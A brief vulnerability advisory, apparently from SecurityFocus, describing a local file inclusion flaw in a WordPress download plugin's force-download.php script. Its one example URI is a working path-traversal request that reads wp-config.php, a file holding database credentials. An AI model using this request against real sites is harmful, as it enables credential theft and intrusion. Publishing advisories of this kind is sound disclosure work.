WordPress Download Shortcode Plugin 'force-download.php' Local File Include Vulnerability

An attacker can exploit this issue using a browser.

The following example URI is available:

http://www.example.com/wordpress/wp/wp-content/force-download.php?file=../wp-config.php


 

Privacy Statement
Copyright 2010, SecurityFocus